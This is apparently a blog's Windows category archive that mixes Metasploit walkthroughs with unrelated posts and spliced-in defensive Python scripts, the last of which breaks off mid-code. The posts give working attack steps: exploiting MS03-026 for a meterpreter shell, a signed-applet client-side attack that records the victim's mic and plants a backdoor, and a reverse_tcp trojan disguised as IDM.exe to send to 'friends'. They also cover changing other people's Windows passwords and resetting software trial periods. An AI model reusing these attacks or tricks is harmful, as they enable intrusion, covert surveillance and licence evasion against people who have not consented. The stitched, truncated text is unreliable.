Category Archives: Windows


How to pentest Remote PC (Windows 2003 server) with Metasploits - blackMORE Ops

This is a detailed step-by-step guide on how to pentest a remote PC (Windows 2003 Server) with Metasploit. I’ve used BackTrack 5 and Windows 2003 Server in a virtual environment. The ease of pentesting is scary, and readers and sysadmins are advised to update their Windows 2003 servers to the latest patch/service pack and to use additional antivirus and firewall protection against a similar situation. The author takes no responsibility for how this tutorial is used by readers; it is for educational purposes only.


Metasploit is simple to use and is designed with ease-of-use in mind to aid Penetration Testers.
I will be taking you through this demo in BackTrack 5 R3, so go ahead and download that if you don’t already have it:

The reason for using BackTrack 5 R3 is because it has the correct Ruby Libraries.

Metasploit framework has three work environments,

  1. The msfconsole,
  2. The msfcli interface and
  3. The msfweb interface.

However, the primary and most preferred work area is the ‘msfconsole’. It is an efficient command-line interface that has its own command set and environment system.
Metasploit quick guide

Before executing your exploit, it is useful to understand what some Metasploit commands do. Below are the commands you will use most. Their outputs will be illustrated as and when we use them while exploiting boxes in the later part of the article.

  1. search : Typing the command search along with a keyword lists the exploits that match that keyword.
  2. show exploits : Typing the command ‘show exploits’ lists the currently available exploits. There are remote exploits for various platforms and applications including Windows, Linux, IIS, Apache, and so on, which help to test the flexibility and understand the working of Metasploit.
  3. show payloads : With the same ‘show’ command we can also list the available payloads, using ‘show payloads’.
  4. show options : Typing the command ‘show options’ shows the options you have set and possibly ones you might have forgotten to set. Each exploit and payload comes with its own options that you can set.
  5. info : If you want specific information on an exploit or payload, use the ‘info’ command. Let’s say we want complete info on the payload ‘winbind’: we can use ‘info payload winbind’.
  6. use : This command tells Metasploit to use the exploit with the specified name.
  7. set RHOST : This command instructs Metasploit to target the specified remote host.
  8. set RPORT : This command sets the port that Metasploit will connect to on the remote host.
  9. set PAYLOAD : This command selects the payload to deliver, for example a generic payload that gives you a shell once a service is exploited.
  10. set LPORT : This command sets the port number that the payload will open on the server once the exploit succeeds. It is important that this be a port that can be opened on the server (not in use by another service and not reserved for administrative use), so set it to a random four-digit number greater than 1024 and you should be fine. You’ll also have to change the number each time you successfully exploit a service.
  11. exploit : Actually exploits the service. Another version of exploit, rexploit, reloads your exploit code and then executes it. This allows you to try minor changes to your exploit code without restarting the console.
  12. help : The ‘help’ command gives you basic information on all the commands not listed here.

Now that you are familiar with all the basic commands, you are ready to launch your exploit. Let’s choose a couple of scenarios to get control of a remotely connected machine.

Lab Setup:

Victim Machine
OS: Microsoft Windows Server 2003

Attacker (Our) Machine
OS: BackTrack 5 R3
Kernel version: Linux bt 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
Metasploit Version: Built in version of metasploit 3.8.0-dev


The only information provided to us about the remote server is that it is a Windows 2003 Server, and the objective is to gain shell access to this remote server.

Detailed Steps

Step 1 – Scan with nmap for open ports

Perform an nmap scan of the remote server
The output of the nmap scan shows us a range of ports open which can be seen below in Figure 1.

Figure 1: Step 1 – Scan with nmap for open ports

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.
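As an added defender-side check that is not part of the original post, the following Python parses nmap grepable output (the -oG format) and flags hosts that expose the ports this attack path needs reachable: 135 (the DCOM endpoint mapper) plus the SMB ports usually open alongside it on a 2003 host. The scan text is a constructed sample; an administrator patching against MS03-026 would run this over a real -oG file of their own network.

```python
"""Flag hosts whose nmap scan exposes MS-RPC/SMB to the scanning network.
Added example; the scan output below is constructed, not a real capture."""
import re
from dataclasses import dataclass, field

# Ports a defender of Windows 2003 hosts should not see reachable from
# untrusted networks: 135 is the DCOM endpoint mapper used in this post.
WATCHED_PORTS = {
    135: "msrpc (DCOM endpoint mapper)",
    139: "netbios-ssn",
    445: "microsoft-ds (SMB)",
}

# One grepable line per host: "Host: <ip> (<name>)<TAB>Ports: <list>..."
HOST_RE = re.compile(
    r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\s+Ports:\s+"
    r"(?P<ports>.*?)(?:\s+Ignored State:.*)?$"
)


@dataclass
class Exposure:
    ip: str
    name: str
    open_ports: list = field(default_factory=list)
    exposed: dict = field(default_factory=dict)  # port -> description


def parse_grepable(text):
    """Return one Exposure per 'Ports:' line in nmap -oG output."""
    results = []
    for line in text.splitlines():
        m = HOST_RE.match(line.strip())
        if not m:
            continue  # comments and "Status: Up" lines carry no ports
        exp = Exposure(m["ip"], m["name"])
        for entry in m["ports"].split(","):
            # entry: port/state/proto/owner/service/rpcinfo/version/
            fields = entry.strip().split("/")
            if len(fields) < 3 or fields[1] != "open" or fields[2] != "tcp":
                continue  # filtered/closed ports are not reachable
            port = int(fields[0])
            exp.open_ports.append(port)
            if port in WATCHED_PORTS:
                exp.exposed[port] = WATCHED_PORTS[port]
        results.append(exp)
    return results


def hosts_needing_review(text):
    """Map ip -> sorted watched ports for every host exposing at least one."""
    return {e.ip: sorted(e.exposed) for e in parse_grepable(text) if e.exposed}


def report(text):
    """Human-readable lines, one per host that needs patch/firewall review."""
    lines = []
    for exp in parse_grepable(text):
        if not exp.exposed:
            continue
        svc = ", ".join(f"{p} {d}" for p, d in sorted(exp.exposed.items()))
        lines.append(f"{exp.ip} ({exp.name or 'no name'}): {svc}")
    return lines


# Constructed sample of nmap -oG output for a small lab segment.
SAMPLE_SCAN = (
    "# Nmap 5.51 scan initiated (constructed sample)\n"
    "Host: 192.168.56.101 (win2003)\tStatus: Up\n"
    "Host: 192.168.56.101 (win2003)\tPorts: 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "3389/open/tcp//ms-term-serv///\tIgnored State: closed (996)\n"
    "Host: 192.168.56.102 (web01)\tPorts: 80/open/tcp//http///, "
    "135/filtered/tcp//msrpc///\tIgnored State: closed (998)\n"
    "Host: 192.168.56.103 ()\tPorts: 22/open/tcp//ssh///\tIgnored State: closed (999)\n"
)

if __name__ == "__main__":
    for line in report(SAMPLE_SCAN):
        print(line)
```

Hosts listed by hosts_needing_review are the ones to confirm as patched or to firewall off from untrusted segments.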

Step 2 – Open msfconsole

In your copy of BackTrack, go to:
Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole

Figure 2: Step 2 – Open msfconsole

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the display as shown in Figure 3.

Figure 3: Step 2 – Open msfconsole (2)

Step 3 – Search RPC exploit in Metasploit

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.
To list all the exploits supported by Metasploit we use the “show exploits” command. This command lists all the currently available exploits; a small portion of the output is shown below in Figure 4.

Figure 4: Step 3 – Search RPC exploit in Metasploit

As you may have noticed, the default installation of Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile, so finding a specific exploit in this huge list would be a really tedious task. So we use a better option: you can either visit the link, or, as an alternative, use the “search” command in Metasploit to find exploits related to RPC.
In msfconsole type “search dcerpc” to search for all the exploits related to the dcerpc keyword, as such an exploit can be used to gain access to a server with a vulnerable port 135. A list of all the related exploits is presented in the msfconsole window, as shown below in Figure 5.

Figure 5: Step 3 – Search RPC exploit in Metasploit (2)

Step 4 – Gather info about target exploit

Now that you have the list of rpc exploits in front of you, we would need more information about the exploit before we actually use it. To get more information regarding the exploit you can use the command “info exploit/windows/dcerpc/ms03_026_dcom” which provides information such as available targets, exploit requirements, details of vulnerability itself, and even references where you can find more information. This is shown in Figure 6.

Figure 6: Step 4 – Gather info about target exploit

Step 5 – Activate exploit

The command “use” activates the exploit environment for the exploit. In our case we would use the command “use exploit/windows/dcerpc/ms03_026_dcom” to activate our exploit.

Figure 7: Step 5 – Activate exploit

From the above figure it is noticed that, after the use of the exploit “exploit/windows/dcerpc/ms03_026_dcom” the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >” which symbolizes that we have entered a temporary environment of that exploit.

Step 6 – Configure exploit

Now, we need to configure the exploit as per the need of the current scenario. The “show options” command displays the various parameters which are required for the exploit to be launched properly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.
We enter the command “set RHOST” and we see that the RHOST is set to

Figure 8: Step 6 – Configure exploit

Step 7 – Set payload for exploit

The only step remaining now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the “show payloads” command.
As shown in the below figure, “show payloads” command will list all payloads that are compatible with the selected exploit.

Figure 9: Step 7 – Set payload for exploit

For our case, we are using the reverse TCP meterpreter, which can be set using the command “set PAYLOAD windows/meterpreter/reverse_tcp”; it spawns a shell if the remote server is successfully exploited. Now you must again view the available options using “show options” to make sure all the compulsory fields are properly filled so that the exploit launches properly.

Figure 10: Step 7 – Set payload for exploit (2)

We notice that the LHOST for our payload is not set, so we set it to our local IP, i.e. using the command “set LHOST

Step 8 – Launch exploit and establish connection

Now that everything is ready and the exploit has been configured properly it’s time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the exploit or not. This option is not present for all exploits, but it can be a really useful check before you actually exploit the remote server, to make sure the server is not patched against the exploit you are trying against it.

In our case, as shown in the figure below, our selected exploit does not support the check option.

Figure 11: Step 8 – Launch exploit and establish connection

The “exploit” command actually launches the attack, doing whatever it needs to do to have the payload executed on the remote system.

Figure 12: Step 8 – Launch exploit and establish connection (2)

The above figure shows that the exploit was successfully executed against the remote machine due to the vulnerable port 135.

This is indicated by the change in prompt to “meterpreter >”.

Step 9 – Perform an action on pentested server

Now that a reverse connection has been setup between the victim and our machine, we have complete control of the server.

We can use the help command to see which commands are available to us on the remote server to perform the related actions, as displayed in the figure below.

Below are the results of some of the meterpreter commands.

Figure 13: Step 9 – Perform an action on pentested server

Step 9 – Perform an action on pentested server (2)

How to Play Android Games on PC?

Android is one of the best mobile operating system around especially with the array of various apps and services it provides users. But not everyone has access to an android phone. This doesn’t mean you have to miss out on all the cool stuff. You can use BlueStacks to do the trick. It is an easy to use android emulator for the PC. The app was mainly created as a means for android testing for developers but now it is being widely used as an alternative gaming platform. Even though the software is in its beta version everything works just fine. Here I will show you how to setup BlueStacks on your computer and use it to play Android games on PC.

Play Android Games on PC with BlueStacks Emulator

Download BlueStacks

You can download the software from their official website which provides an online installer which can be downloaded from here. It will download files during the installation process. If you don’t prefer using the online installer, the BlueStacks offline installer can be downloaded from here. Both installation processes are quite straightforward and it will be completed quickly.


This is how the home page looks like. Its interface is similar to a tablet. It has the home, back, recent apps, share and close buttons on the bottom. You can download apps from Google PlayStore, GetJar, Amazon AppStore or 1Mobile Market. You can also directly install apps if you already have the APK files downloaded.

Download Apps Online

In order to download apps from Google PlayStore you will have to provide a Google account. You can get this done from the settings options on the top of the screen then Account and Sync. It will sync the contacts and other information from your Google account.

Account and Sync

Once this is done you can easily download apps of your choice. There is a wide variety of apps given on the home screen or you can search for specific apps in the search option. When the download is finished the app can be found in the all apps options in the top right hand corner. You’ll also get a notification.

Download Apps

Install Android Games Offline

If you don’t have an active internet connection you can still install apps if you have their APK files. Once BlueStacks has been installed, you can install the apps simply by double-clicking the APK files. You can later run them using BlueStacks just by clicking on it. So if you don’t want to go through all the online stores this is the best way to go.

Install APK on Computer Using BlueStacks

Sync Your Phone With PC

You can sync your android phone with BlueStacks. This way you will have all your apps, contacts and other stuff on both devices. For this you have to download BlueStacks Cloud Connect to your phone. You will have to click on the time in the menu bar below. Click on the pop-up menu that appears then select settings.


Click on the cloud connect option then you will be asked to provide your email ID and phone number. Once that is done a PIN will be provided to you which should be provided at the time the Cloud Connect app is opened on your mobile. This way you can use WhatsApp from your PC in case your mobile is out of order.

Cloud Sync

This is how you can download and install BlueStacks and run all Android apps or games on your computer. Though BlueStacks is an awesome way to experience Android on your computer, it does have its own set of cons. We’ll anyway discuss the pros first!

Pros of BlueStacks

1. BlueStacks is capable of running tons of games and apps available on PlayStore so there is something for everybody’s taste. You can use it as an emergency alternative for your phone as you can use your WhatsApp on your PC whilst the phone is being repaired.

2. The interface of BlueStacks is very similar to that of a smartphone or a tablet including home button, back button and even notification. So if you want to experience Android without spending hundreds of dollars buying a smartphone, BlueStacks is the best way to go. However you will have to wait for the latest version of Android as BlueStacks comes with the Gingerbread version which is outdated.

3. It provides online support too so you can play multi-player games online with your friends just like you’d play them on your smartphone or tablet. You can share your scores and compete with them as well.

4. With BlueStacks you can use the webcam of your PC to take photos using photo apps like Instagram, Flickr etc. You can now edit and share your pictures instantly.

5. Many Android games support gamepad but it’s tedious to play games on a smartphone using a gamepad. Using BlueStacks you can play these games on your PC turning your PC into a mini gaming console. Not all games support gamepad so don’t be shocked if you aren’t able to play your favorite game using a gamepad on your computer. It’s neither BlueStacks fault nor your gamepad’s. It’s just that not all Android apps or games are compatible with gamepads. Sometimes the brand of your gamepad might also cause problems. So always go for reputed brands and avoid cheap Chinese clones. Some gamepads I’ve tested so far include Logitech and Enter.

Cons of BlueStacks

Even though it is a brilliant emulator it has its own fair share of problems.

1. It requires a PC with above-average specs to run all the games without glitches. It requires a minimum of 4 GB RAM or the programs tend to lag. You can instead download the PC version of your favorite games and play them without BlueStacks. They’ll probably use fewer resources!

2. Multitasking can pose questions as it tends to slow down the machine.

3. BlueStacks runs on Android Gingerbread 2.3.4 and there is no way till now to update the operating system. So there will be some apps which won’t run and it can also have some memory management issues.

4. Some users who downloaded the offline installer found some viruses in it. The link which I have provided above is perfectly safe as I haven’t encountered any such problem so far.

5. Some antivirus software don’t support BlueStacks and abort the installation process so the fun ends even before it starts. But again I have to say I breezed through the installation process with no problems.

Even though there are other Android simulators available, few provide such flexibility and are easy to use. This is one of the best software around to play android apps on PC so download it and get started. Some complex ways include installing Android on your computer as a separate operating system, using Android SDK and using some paid emulators. I’ll soon include them in this list.

How To Hack Windows 8 With Metasploit

How To Exploit / Hack Windows 8 With Metasploit

A lot of you want to hack Windows 8.

In this article we’re going to learn how to exploit Windows 8 (Preview Build 8400) with a client-side attack technique; we’ll get a meterpreter session on the Windows 8 machine. For those who don’t know what the Metasploit Project is:

The Metasploit Project is a computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the open-source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shell-code archive, and security research. The Metasploit Project is also well known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework. (Wikipedia)

In this article we’re going to work with the Metasploit console presented in the first figure.


Figure 1. Metasploit Console

How to prepare your labs ?

First, you need BackTrack 5 with Metasploit, or you can download the Metasploit project for your system from the link below. Secondly, you need “Windows 8 Preview Build 8400”.


Figure 2. MSFGUI

Now ready for exploiting?

1 – First, open the terminal and type “msfconsole”.


I typed “sudo su” to take root privilege first because I’m not working on BackTrack; if you’re on BackTrack just type msfconsole in the terminal, as shown in Figure 3.


Figure 3. Msf console terminal

Wait for a while and it will open; you’ll see a command line starting with MSF> as shown in Figure 4.


Figure 4. Msf command line

2 – Secondly, I’ll use an exploit called “java_signed_applet”, which targets vulnerable Java versions and can affect a huge number of computers.

We’ll type in msf > search java signed, as shown in Figure 5.


Figure 5. Search for java signed applet

We’ll use the first one, exploit/multi/browser/java_signed_applet. To use any exploit in the Metasploit project, type “use” before the exploit name, as shown in Figure 6.


Figure 6. Use exploit


To get more info about the exploit you can type “info”, as shown in Figure 7. Here’s the exploit’s description, and I think that now we understand how this exploit works (Listing 1). We need to know the options for this exploit, so we’ll type in “show options”; they are also included in the info output, as shown in Figure 8.


Figure 7. Exploit information

Listing 1. Exploit Description


This exploit dynamically creates a .jar file via the Msf::Exploit::Java mixin, then signs it. The resulting signed applet is presented to the victim via a web page with an applet tag. The victim’s JVM will pop a dialog asking if they trust the signed applet. On older versions the dialog will display the value of CERTCN in the “Publisher” line. Newer JVMs display “UNKNOWN” when the signature is not trusted (i.e., it’s not signed by a trusted CA). The SigningCert option allows you to provide a trusted code signing cert, the values in which will override CERTCN. If SigningCert is not given, a randomly generated selfsigned cert will be used. Either way, once the user clicks “run”, the applet executes with full user permissions.


Figure 8. Show options

3 – Next, we’ll set the SRVHOST, which will be the attacker IP. We’ll type “ifconfig” in the terminal to get the internal IP address, as shown in Figure 9 – it’s


Figure 9. ifconfig

• We’ll type in “set SRVHOST”

• We’ll set the target, which is (1 – Windows x86), because we’re going to attack a Windows machine, so type in “set target 1”

• We’ll set the LHOST which is Attacker IP and, because it’s inside an Internal network, we’ll set it with our local IP (


Figure 10. set SRVHOST


Figure 11. Set target


Figure 12. Set LHOST


If you’d like to attack outside your local network, you need to set your public IP address in LHOST, and enable DMZ on attacker machine or enable port forwarding.

• Now you need to know which payload you’ll use after attacking the machine; the most familiar one is meterpreter, so we’ll set the payload (windows/meterpreter/reverse_tcp), as shown in Figure 13.


Figure 13. Set Payload


If you’d like to use another payload you can type in “show payloads” and choose your preferred payload.

• We’ll specify the URI which will be sent to the victim machine. I want it on the main directory, so I’ll type in “set URIPATH /”, as shown in Figure 14.


Figure 14. Set URIPATH


If you need to specify another URI name you can do it easily by typing in “set URIPATH name” and you can change “name” to your preferred word.

• We’ll type in “exploit” to run it, and it will give us the URL, which is our IP address with the chosen URIPATH – Figure 15.


Figure 15. Exploit

Now, we need to send the URL to a victim machine, so we’ll open it on our Windows 8 machine.

• Finally, a message will appear on the victim machine after opening the URL. If he/she clicks Run, a meterpreter session will be opened on the attacker PC, as shown in Figure 16.


Figure 16. Meterpreter

We can run some commands against the victim PC, such as capturing the screen or recording the mic.

First, here’s the first command, “sysinfo”, which tells you some information about the system (Figure 17).


Figure 17. System information

We can also see which processes are running on the victim machine at the time with the “ps” command (Figure 18).


Figure 18. Processes


Figure 19. Mic record

And if you need to take a screenshot of the victim’s screen, you can do it easily with the “screenshot” command (Figure 20).


Figure 20. Screen-shot

Finally, I tried to upload a payload and execute it on the victim machine; so, if you want to keep the victim longer, you should upload another backdoor to keep in touch with them (Figure 21).


Figure 21. Upload executable file

If you need any help with meterpreter, just type “help” and all commands will be listed on your screen (Figure 22).


Figure 22. Help


How to crack Windows passwords

Related downloads:

The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.

How to make the CD

Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like; most support writing ISO images. Often double-clicking on it in Explorer will pop up a program offering to write the image to CD. Once written, the CD should only contain some files like “initrd.gz”, “vmlinuz” and some others. If it contains the image file “cd??????.iso”, you didn’t burn the image but instead added the file to a CD. I cannot help with this; please consult your CD software manual or friends.

The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.

How to make a bootable USB drive

  • Copy all the files inside the USB zip (or on the CD) onto a USB drive, directly on the drive, not inside any directory/folder.
  • It is OK if there are other files on the USB drive from before; they will not be removed.
  • Install the bootloader on the USB drive from a command prompt in Windows (start the command line with “run as administrator” if possible):
    • X:\syslinux.exe -ma X:
  • Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:).
  • If it seems like nothing happened, it is usually done.
  • However, a file named ldlinux.sys may appear on the USB drive; that is normal.
  • It should now in theory be bootable.
  • Please know that getting some computers to boot from USB is worse than from CD; you may have to change settings, or some will simply not work at all.

How to make the floppy

The unzipped image (bdxxxxxx.bin) is a block-by-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.

  • Unzip the bd zip file to a folder of your choice.
  • There should be 3 files: bdxxxxxx.bin (the floppy image), rawrite2.exe (the image writing program), and install.bat, which uses rawrite2 to write the .bin file to floppy.
  • Insert a floppy in drive A: NOTE: It will lose all previous data!
  • Run (double-click) install.bat and follow the on-screen instructions.


Offline NT Password & Registry Editor, Walkthrough


The following is a walkthrough of using the CD to reset one user (admin) on a test Vista computer.

Insert the CD and convince your BIOS that it should boot from it. How to boot from a CD varies from computer make to computer make, so it depends on your mainboard. Some BIOSes show a boot device select menu if you press ESC, F8, F11 or F12 or something like that during the self test (some even tell you on the screen what to press).

If it boots, you should see this ->

Usually just press enter here. If you have linux knowledge, you can tweak kernel options if you need/like.

Then it boots and outputs a lot of kernel messages about your hardware and such; most if not all are nothing to worry about.

Most of the generic Linux boot is now done, and we try to load the disk drivers. If you use the floppy version you will be asked to swap floppies at this point. Drivers are then tried based on PCI hardware identification.

Most of these messages are from the drivers themselves. Some talk a lot, some don’t. But all give info on the brand, model and size of the disks found, if any.

Here you select one of the partitions listed above (in this case there is only one) or one of the letters from the menu. If there is a 100MB partition and a big one, select the big one.

Floppy users may need to do ‘f’ to load in more drivers from another floppy.

The ‘d’ option will re-run the PCI scan and start relevant drivers (they must already be loaded from floppy with ‘f’ option)

The ‘m’ for manual load will present a list of all the drivers with a short description if available, and allow you to specify which to load. (Dependencies are handled automatically.)

Here we only have one partition, so we just press enter to select it.

The registry is usually system32/config under WINDOWS or WINNT directory, depending on the windows version (and it may be changed during installation).

If the correct partition has been selected, the default prompt will be adjusted to match if it can find one of the usual variants.

Press enter, and the program will tell you if the correct directory has been selected. Choice 1 is for password edit, the most used. But if you wish, you can load any of the files (just enter its name) and do a manual registry edit on them.

But here we select 1 for password edit; some files are copied into memory and the edit application is invoked. This demo shows selection 1 for password edit, but you can also do other things.

Note that 2, Syskey, may be dangerous, AND IS NOT NEEDED TO RESET PASSWORDS! It does not work at all on Vista, but you get some info before you make any changes.

Selection 3, RecoveryConsole is only relevant for Win2k, XP and 2003 and you must have selected to load the SOFTWARE part of the registry (selection 2) earlier.

The manual registry editor is always available, it is not the most user-friendly thing, but anyway..

We continue our quest to change our “admin” user’s password. This is a list of all local users on the machine. You may see more users here than in the overly user-friendly control panel; for example, XP has some built-in help and support users.

The users marked “ADMIN” are members of the administrators group, which means they have admin rights, if you can login to one of them you can get control of the machine.

The built-in (at install time, in all Windows versions) administrator is always RID 01f4. This example is from Vista, and Vista by default has this locked down (the installer instead asks and makes another user the regular administrator, in this case RID 03e8).

The “lock?” column shows if the user account is disabled or locked out (due to many logon attempts, for example), or BLANK if the password seems to be blank.

We select to edit the “admin” user (this was the user made administrator by the Vista installer). Some status info: the user is locked out if “Disabled” is set or “Failed login count” is larger than the “max tries” policy setting. This user is not locked in any way. The lockout can be reset with option 4 below.

Here we just reset/clear/blank the password.

You can also try to set a new password with option 2, but it will only work if the password is not already blank. Also, it often fails to work on XP and newer systems.

Number 3 puts a non-admin user into the administrators (220) group, thus making the user an administrator. IT IS STILL EXPERIMENTAL AND MAY sometimes RESULT IN STRANGE ERRORS WHEN LATER EDITING THE GROUP FROM WINDOWS! Also, it is usually pointless to promote the Guest user, as it is most likely forbidden to log in by the security policy settings. The exclamation point (!) quits out (it’s SHIFT 1 on the US keyboard layout used on the boot CD).
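The RIDs the tool prints (01f4, 03e8 and the 220 group) are hexadecimal forms of well-known Windows RIDs. The Python below is an added example, not anything shipped with the editor: it decodes such values, pulls the RID out of a textual SID, and classifies a user list in the shape of the tool’s output (constructed sample), so an administrator reviewing accounts after an offline reset can recognise which entries are built-in and which were created later.

```python
"""Decode the hex RIDs shown by the offline password editor into the
well-known Windows RIDs an administrator should recognise.
Added example; the user list below is constructed."""

# Well-known relative identifiers (decimal).  500/501 are the built-in
# accounts; 544/545/546 are the local Administrators, Users and Guests groups.
WELL_KNOWN_RIDS = {
    500: "built-in Administrator",
    501: "built-in Guest",
    544: "Administrators (local group)",
    545: "Users (local group)",
    546: "Guests (local group)",
}
FIRST_USER_RID = 1000  # accounts created after install start here


def rid_from_hex(text):
    """The tool prints RIDs as bare hex: '01f4' -> 500, '03e8' -> 1000."""
    return int(text.strip(), 16)


def rid_from_sid(sid):
    """Last sub-authority of a textual SID: 'S-1-5-21-...-500' -> 500."""
    parts = sid.strip().split("-")
    if len(parts) < 4 or parts[0] != "S" or parts[1] != "1":
        raise ValueError(f"not a SID: {sid!r}")
    return int(parts[-1])


def describe_rid(rid):
    if rid in WELL_KNOWN_RIDS:
        return WELL_KNOWN_RIDS[rid]
    if rid >= FIRST_USER_RID:
        return "created after install"
    return "reserved well-known RID"


def is_admin_entry(rid, flags):
    """Admin if the tool marked it ADMIN or it is the built-in RID 500."""
    return "ADMIN" in flags.upper() or rid == 500


def audit_user_list(entries):
    """entries: (hex_rid, username, flags) tuples as the tool lists them.
    Returns [(username, rid, description, is_admin)] sorted by RID."""
    rows = []
    for hex_rid, name, flags in entries:
        rid = rid_from_hex(hex_rid)
        rows.append((name, rid, describe_rid(rid), is_admin_entry(rid, flags)))
    return sorted(rows, key=lambda r: r[1])


def admins_to_review(entries):
    """Usernames with admin rights: the set to compare against what the
    organisation actually expects after a password reset."""
    return [name for name, _, _, admin in audit_user_list(entries) if admin]


# Constructed sample in the shape of the tool's user list (RID, name, flags).
SAMPLE_USERS = [
    ("03e8", "admin", "ADMIN"),
    ("01f4", "Administrator", "ADMIN dis/lock"),
    ("01f5", "Guest", "dis/lock"),
    ("03e9", "bob", ""),
]

if __name__ == "__main__":
    for name, rid, desc, admin in audit_user_list(SAMPLE_USERS):
        print(f"{rid:5d} {name:14s} {desc:30s} admin={admin}")
    print("administrators group RID:", rid_from_hex("220"))
```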

Then we get back to the main menu, and select to quit. You must answer y, or the changes will not be saved. This is the last chance to change your mind!

Only changed files of the registry are actually written back.

If you forgot something, you may run again; else press CTRL-ALT-DEL to reboot. If you see an error message now, this does not mean that it isn’t working.

Reboot and test if Windows can be accessed again.


Note: This trick works only if the computer is already turned on; then you can change the password.

Step 1: Click on start and then search for cmd (i.e., command prompt).

Step 2: Right click and then click on Run as administrator. It will prompt for request to proceed. Click on OK and then the command window will open.

Step 3: Type net user. This command lists the names of all the user accounts present on the computer.

Step 4: Change the password of each user account one by one by typing:
net user useraccount password

Here useraccount is an account name you got from step 3, and in place of password type your desired password.
With these simple steps you can change your Windows password, or even your friends’.


Reuse the software after the trial period is over

This is a very common question faced day to day by the common man: how can I reuse software whose trial period has elapsed?
For this you need to follow these simple steps, but beware: any mistake can lead to several problems on your laptop. So do this with care, and if you are not sure then don’t do it.

Step 1: Uninstall the software and follow the steps.
Step 2: After uninstalling the software, open Run (Windows key + R), type regedit and hit Enter.
Step 3: The Registry Editor window will appear. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\<Your Software name> in the left pane of this window. If you find any key named after your software, simply delete that key.
Step 4: Similarly navigate to HKEY_CURRENT_USER\Software\<Your Software name>; if you find any key with your software’s name, delete it and close the Registry Editor window.
Step 5: Again go to Run, type %temp% and hit Enter.
Step 6: Now delete everything in that temporary folder. Don’t panic, as these are temporary files and are not necessary for your operating system.
Step 7: Now go to C:\Users\<your username here>\AppData. Under AppData open all three folders, “Local”, “LocalLow” and “Roaming”, and check. If under these three folders you find any folder or anything with your software’s name, just delete it.
Step 8: Now restart your PC and install the expired software; you can use it again for the trial period.


Let’s start.

OK, so basically we need to create a payload.
So, boot your BackTrack 5 and open the Terminal/Console.
msfpayload <your payload> LHOST=<your ip> LPORT=<port number> x > <path>/<name of payload>
msfpayload windows/meterpreter/reverse_tcp LHOST=(your ip add) LPORT=4444 x > root/desktop/IDM.exe
This should create your IDM.exe msfpayload.
Now, you need to upload your file, which in this case is IDM.exe, to any file uploading and sharing site such as MediaFire or 4shared.
Now, you need to give the download link of your file to your friends and let them download it.
Open a new terminal and type in,
It will take some time...
After some time it will open the MSFCONSOLE window.
Type in,
use exploit/multi/handler
Now, set the payload by typing in:
set PAYLOAD windows/meterpreter/reverse_tcp
Now, set the local host by typing:
set LHOST (your ip here)
Now, after setting up the payload and the local host, it’s time to start the exploit.
Now type in...
and press enter...
and wait till your friend or the victim installs the file, which is IDM.exe.
Once the victim has downloaded, installed and run the file on his computer, you will see the response on your computer; then type in...


This is to create a channel; if nothing happens, type in shell again. After the channel is created you can access the Windows machine.

Now you will see that you have access to the C drive of the victim’s computer, basically the drive on which the OS is installed. So if you want then type in

to get the system information about the victim’s computer.
You can also create a directory on the victims drive and then transfer viruses or trojans on the computer….!

Now, to prevent anyone from doing this on your computer, have a firewall!
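The firewall advice above covers only half the picture: the payload built in this post is a reverse TCP connection, which an inbound-only firewall never sees. The Python below is an added detection example, not the post’s code; it reads process network events in the shape of Sysmon Event ID 3 (the CSV field names and all sample events are constructed) and flags outbound connections from executables running out of user-writable folders, or to the handler port used above.

```python
"""Spot the egress pattern a reverse_tcp payload creates: an executable
launched from a user-writable folder opening an outbound connection,
often to a handler port such as 4444.  Added example; events constructed."""
import csv
import io
import re

# Folder names under which a downloaded "IDM.exe" style binary would run.
USER_WRITABLE_DIRS = {"desktop", "downloads", "temp", "appdata", "public"}
# 4444 is the LPORT used in this post (and Metasploit's default); extend
# with whatever your environment treats as unexpected.
SUSPECT_PORTS = {4444}
# Destinations known to be legitimate (constructed for the sample).
ALLOWED_DESTINATIONS = {"10.0.0.5"}


def path_reasons(image):
    """Reasons based purely on where the executable lives."""
    segments = [s.lower() for s in re.split(r"[\\/]+", image) if s]
    if any(seg in USER_WRITABLE_DIRS for seg in segments[:-1]):
        return ["executable runs from a user-writable folder"]
    return []


def analyse_event(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    if event["initiated"].lower() != "true":
        return []  # inbound connection; not the reverse-shell pattern
    if event["dst_ip"] in ALLOWED_DESTINATIONS:
        return []
    reasons = path_reasons(event["image"])
    if int(event["dst_port"]) in SUSPECT_PORTS:
        reasons.append(f"destination port {event['dst_port']} is a known handler port")
    return reasons


def find_suspicious(csv_text):
    """Parse CSV events; return [(image, 'ip:port', reasons)] for hits."""
    hits = []
    for event in csv.DictReader(io.StringIO(csv_text)):
        reasons = analyse_event(event)
        if reasons:
            dest = f"{event['dst_ip']}:{event['dst_port']}"
            hits.append((event["image"], dest, reasons))
    return hits


# Constructed sample in the shape of Sysmon network-connection events.
SAMPLE_EVENTS = """time,image,user,dst_ip,dst_port,initiated
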